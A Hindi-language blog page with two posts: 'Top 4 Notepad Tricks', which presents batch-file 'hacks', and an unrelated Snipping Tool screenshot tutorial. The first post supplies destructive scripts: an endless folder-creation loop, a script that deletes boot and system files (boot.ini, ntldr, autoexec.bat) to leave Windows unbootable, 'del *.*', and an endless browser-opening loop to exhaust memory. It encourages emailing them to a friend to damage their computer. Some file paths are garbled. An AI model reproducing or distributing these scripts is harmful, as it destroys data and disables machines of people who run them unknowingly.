शनिवार, 20 जून 2020

Top 4 Notepad Tricks In Hindi - DANGEROUS AND DEADLY

Top 4 Notepad Tricks In Hindi - DANGEROUS AND DEADLY
Namste dosto, agar aap hacking tips & tricks me interest rakhte ho to aapke liye hum lekar aaye he Top 4 notepad tricks in hindi, yah trick bahoti dangerous hai jiske baare me humne aage likha hua hai..

Top Dangerous Tricks Jiski Madad Se Aap Koi Bhi Laptop Hang Kar Sakte ho.

Note : SOME DANGEROUS AND DEADLY TRICKS[CAUTION] DO NOT TRY THESE FOR FUN!!


Top 4 Notepad Tricks In Hindi - DANGEROUS AND DEADLY Hacking Tricks in Hindi

to dosto dhyaan rakhiyega ye sab try karne se pehle backup vagera le lijiyega, baadme hi ye sab tips & tricks ka use kare..


1. How to create more than 3,000 folders under a minute

Step  1: Aap Pehle apne PC me Notepad Ko Open Karle Aur Iss Code Ko Copy Karle
@echo off
:top
md %random%
Is code ko Copy Karle Baadme

Step 2: Ab Save As Pe Click Karke 1000.bat Ke naam se iss file ko save kare aur aap baadme open karoge to kuch hi seconds me command me process chalu ho jaayega aur 1000 folder ban jaayega


2. How to Shutdown a computer forever?

Iss code ko copy kardo aur notepad me past kardo
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windows
win.ini
del c:windowswin.ini
Baadme past karne Ke Baad save as pe jaake Shutdown-forever.bat save Karde
Ye aapke liye bahot khatarnaakh ban Sakti he.


3. How to Delete all your system

Simple he bas iss code ko copy karke Aap Ko save As Karke Delete-sys.bat karke save kardena he
del *.*
Bas Iss code ko copy past karna he notepad me.


4. RAM crashing trick in hindi

Open notepad And Type Kare
:A
start https://besthinditricks.blogspot.com/
goto A
Save As "Ram-crash.bat"  aur open Karte h ram crash ho jaayegi

Issi tarah aap kisike Bhi laptop ya PC computer ko Hang Crash etc Ya mail karke apne friend Ke Computer ko bigaad sakte ho.

NOTE : Try at your own risk
WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…
ENJOY! Keep visiting :) 

(Best Notepad Tricks In Hindi for hack any pc)

रविवार, 24 जनवरी 2016

Laptop/Computer (PC) Me Screenshot Take Kaise Kare [Easy Method]

Laptop/Computer (PC) Me Screenshot Take Kaise Kare [Easy Method]

Hello Beaters, Hum Baat Karenege Ki Computer Ya Leptop PC Me Screenshot take kaise Kiya jaa sakta he without any shortcut keys.


Laptop/computer Screenshot Take


Aaj kal me screenshot bahoti upyogi chiz ban chuki he jeseki Croping screenshots mobile screenshots aur pc screenshot pc me koi images ke screenshots.

Agar aap ek blogger he ya news waala blog he to bhi aap kahise image ka screenshot take kar sakte ho to ye ek behatarin trick he jisse aap easily screenshots take kar sakte ho aur ye ek system tool he.

Kuch ese pc hote he jahape log screen shots nahi nikaal pate isliye ye ek best trick he jiski madad se easily aur ek achha sa pc ka screenshot take kar sakte he.


Kuch Ese Pc hote he jahape Shortcut button se hi screen shot nikala jaa sakta he lekin kuch ese pc bhi hote he jisme shortcut button nahi hote to uskke liye best trick he.

Ye Trick saayad bahoti kam log jaante honge chalo me aapko mera ek old Computer tha udme ek Print Screen Karke ek button aata tha to pehle me uss button ko daabke Paint me jaake Ctrl+V yaaniki Past karta tha aur uss image me editing karke me screen shots ko banata tha.

lekin ye ek behatarin aur jabardast trick he jisse aap Screen Shots Ko Systemic App se Crop Direct kar sakte ho aur directly save kar sakte ho.

Laptop/Computer (Pc) Me Screenshot Take Kaise Kare?


Pehle To Aap Apna Start Manu Ko Open Kare aur search marne ki jagah me Snipping Tool Search kare aur  Snipping Tool ko open kare Aur Baadme Small Window Open Hoga jisme New Ke side me EK Baar Open Karne ka Hoga Jahape Click Karne se kuch Options Honge


1. Free-Form Snip
2. Rectanguler snip
3. window snip
4. Full-screen snip



1# Free-Form Snip


Ye option ki madad se aap jitna chahe utna yaaniki lining crop kar sakte ho. Iska Use Kahipe Likhi hui text Rounding Crop ya koi esa image ho jo crop nahi ho sakte ho usko bhi iss ki madad se crop kiya jaata he.



2# Rectanguler Snip


Iss Screen Shot ke option se aap Rectangle Crop karke screen shots nikaal sakte ho. Iska Use Kisi Ka Screen Shot achhi tarah aur bada lena he to isski madad se aap le sakte ho.



3# Window Snip


Es Option ki madad se aap Pure Ke Pura window ka screen shot le sakte ho. iska use aap apne kuch Bade Image ya bade se websites ka le sakte ho.



4# Full-Screen Snip


Iss ki madad se aap without any click screenshot take kar sakte ho. Aur isme screen shot pure ki puri window ka hi aayega aur iske Uses upar #3 No. same to same he.


Aur Usme Andar Editing Options Bhi diye gaye he jis se aap Editing kar sakte ho Jisme Kam Editing options he Sirf Do type ki Pen Hi di gai he Usme Aap Kuch Chize Clicking editing karke bata sakte ho.

Baadme Save Ke Icon Se Aap Save karde aur usme aap .PNG file .Jpeg File me aur bhi kuch files he usme save kar sakte ho.




I hope aapko ye post achhi lagi hogi to Dosto WhatsApp Aur Facebook Jese Social Media Pe share jarur kare.